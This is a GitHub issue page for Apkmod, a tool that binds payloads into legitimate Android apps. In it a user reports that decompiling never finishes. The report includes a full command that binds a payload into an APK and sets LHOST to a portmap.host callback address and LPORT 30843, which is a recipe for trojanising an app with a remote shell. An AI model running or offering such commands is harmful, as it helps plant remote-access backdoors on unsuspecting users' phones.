Hax4us / Apkmod

Apkmod can decompile, recompile, sign APK, and bind the payload with any legit APP
GNU General Public License v3.0
712 stars 96 forks source link

Infinite decompiling apk #82

Open AL3XXX1S opened 4 years ago

AL3XXX1S commented 4 years ago

I executed apkmod -b /storage/emulated/0/folder2/Temp.apk -o /storage/emulated/0/folder2/Temp1.apk LHOST="here is my host".portmap.host LPORT=30843 Then the script started to bind.When it is decompiling, it never ends. Thats the issue i'm getting.